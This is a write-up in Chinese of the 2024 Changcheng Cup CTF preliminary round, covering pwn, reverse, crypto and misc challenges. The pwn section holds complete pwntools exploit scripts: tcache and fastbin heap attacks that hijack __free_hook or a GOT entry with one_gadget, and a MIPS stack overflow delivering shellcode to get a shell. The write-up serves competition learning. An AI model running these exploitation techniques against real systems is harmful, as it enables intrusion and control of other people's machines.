2024年长城杯初赛wp

PWN

kawayi

tcache bin attack

from pwn import *

context(arch='amd64', os='linux', log_level='debug') 

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('192.168.17.148', 8888)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def add(index, size, content):
    r.sendlineafter(b'5.exit', b'1')
    r.sendlineafter(b'index?', str(index))
    r.sendlineafter(b'size?', str(size))
    r.sendafter(b'talk?', content)

def edit(index, content):
    r.sendlineafter(b'5.exit', b'3')
    r.sendlineafter(b'index?', str(index))
    r.sendafter(b'write?', content)

def show(index):
    r.sendlineafter(b'5.exit', b'4')
    r.sendlineafter(b'index?', str(index))

def delete(index):
    r.sendlineafter(b'5.exit', b'2')
    r.sendlineafter(b'index?', str(index))

add(0, 0x410, b'a')
add(1, 0x10, b'a')
delete(0)
show(0)

libc = ELF('./x86_64-linux-gnu/libc-2.27.so')
libc_base = u64(r.recvuntil('\n1.')[:-3][-6:].ljust(8, b'\x00')) - 0x3ebca0

one = [0x4f2a5, 0x4f302, 0x4f302]
ogg = one[1] + libc_base
free_hook = libc_base + libc.sym['__free_hook']

delete(1)

edit(1, p64(free_hook))
add(2, 0x10, p64(ogg))
add(3, 0x10, p64(ogg))

delete(2)

r.interactive()

votestore

fastbin attack，ptr往上0x10位置的变量随着menu中功能被调用的次数递增，递增到合适的数值绕过fastbin申请堆的大小验证

from pwn import *

context(arch='amd64', os='linux', log_level='debug')  #32位arch=‘i386’

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('192.168.17.148', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def add():
    r.sendlineafter(b'choice', b'1')

def edit(name, data):
    r.sendlineafter(b'choice', b'2')
    r.sendafter(b'name', name)
    r.sendafter(b'data', data)

def show():
    r.sendlineafter(b'choice', b'4')

def delete():
    r.sendlineafter(b'choice', b'3')

libc = ELF('./2.23-0ubuntu3_amd64/libc-2.23.so')
ptr = 0x6010B0
atoi_got = elf.got['atoi']

add()
delete()

for i in range(0x3d):
    edit('a','a')

edit(p64(0x06010A0), 'a')

add()
add()
edit(p64(atoi_got), 'a')

show()
r.recvuntil('name:')
libc_base = u64(r.recv(6).ljust(8,b'\x00')) - libc.sym['atoi']

ogg = libc_base + 0xf0897
edit(p64(ogg), p64(ogg))

r.sendline('5')

r.interactive()

babymips

from pwn import *

context(arch='mips', os='linux', endian='big', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('192.168.17.148', 7777)
else:
    r = process(['./qemu-mips-static', file_name])

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode_addr = 0x7ffff590

shellcode = shellcraft.mips.linux.sh()
shellcode = asm(shellcode)

p = b'a' * 0xc + p32(0x41CE10) + b'a' * 0x20 + p32(0x4202F4) + p32(0) * 2 + p32(0x426034) + b'a' * 0x64 + shellcode
r.sendline(p)

r.interactive()

REVERSE

LoginToMe

动调拿一下seed，简单z3爆破

from z3 import *
import libnum
for i in range(33,128):
    x = Solver()
    ans = []
    s = [BitVec(('%d' % i), 32) for i in range(5)]
    x.add(s[0]&0xff==i)
    x.add((s[0] & 0xffff) * (s[0] >> 16) == 0x146E4C25
          , (s[0] & 0xffff) + (s[0] >> 16) == 0x9A66
          , s[1] - s[2] == 0x3BF1F3FD
          , (s[1] & 0xffff) + (s[1] >> 16) == 56269
          , (s[2] & 0xffff) - (s[2] >> 16) == 15092
          , ((s[1] & 0xffff) & 0xff) * ((s[2] & 0xffff) & 0xff) == 10710
          , ((s[1] >> 16) & 0xff) * ((s[2] >> 16) & 0xff) == 12051
          , ((s[1] >> 16) >> 8) + ((s[2] >> 16) >> 8) == 172
          , (s[3] & 0xffff) * (s[3] >> 16) == 171593250
          , (s[3] & 0xffff) + (s[3] >> 16) == 26219
          , (s[4] & 0xffff) * (s[4] >> 16) == 376306868
          , (s[4] & 0xffff) + (s[4] >> 16) == 40341)
    if x.check() == sat:
        model = x.model()
        for i in range(5):
             ans.append(model[s[i]].as_long().real)
    for i in ans:
         print(libnum.n2s(i)[::-1].decode(),end="")
    if ans!=[]:
        print()

CRYPTO

你真的了解RSA吗

#step1
p = 3570689330324393
q = 8539449885098290729
c = 11499128260801730440456056246212361
e = 17
import gmpy2
from Crypto.Util.number import long_to_bytes
n=p*q
fn=(p-1)*(q-1)
d=gmpy2.invert(e,fn)
m=pow(c,d,n)
print(long_to_bytes(m))
b'flag{p*q*r*s_'

step2部分，直接分解int(n) http://www.factordb.com/

p=1235542029039790988583258906019
q=1235542029039790988583258906103
s=1235542029039790988583258906107
r=1235542029039790988583258906163
e=e=0x10001
c= 0x8a20cca012e973b2a8ca161bd1e82804714cc75bd1238f8579cc7a5143c8bb955320b8c2811dc98a4547e9f4fe856e039630
n=p*q*s*r
phi_n=(p-1)*(q-1)*(r-1)*(s-1)
from gmpy2 import *
from Crypto.Util.number import *
d=invert(e,phi_n)
m=pow(c,d,n)
print(long_to_bytes(m))
b'32cacb2f994f6b42183a1300d9a3e8d6'

Problem

将b.txt文件放到sage所在系统，命名为lxz.txt

#sage
import numpy as np

def gravity(n,d=0.25):
    A=np.zeros([n,n])
    for i in range(n):
        for j in range(n):
            A[i,j]=d/n*(d**2+((i-j)/n)**2)**(-1.5)
    return A

b = []
with open("/home/die/lxz/lxz.txt","rb") as f:
    for line in f.readlines():
        b.append(float(line.strip().decode()))
n = 85
kkk= 10 ^ 20
A = gravity(n)

A = [[int(j * kkk) for j in i] for i in A]
b = [int(i * (-1) * kkk) for i in b]
M = [A[i] + [0] for i in range(n)]
M.append(b + [1])
M = Matrix(ZZ, n + 1, n + 1, M)
zz= M.LLL()[0]
print(zz)
flag = M.solve_left(zz)
print(bytes(flag))

MISC

cloacked

将文件头补成.zip的格式，解压得到文件，转成图片， cloacked-pixel解密后改后缀为zip，打开得到flag：Flag{just_a_demo_flag}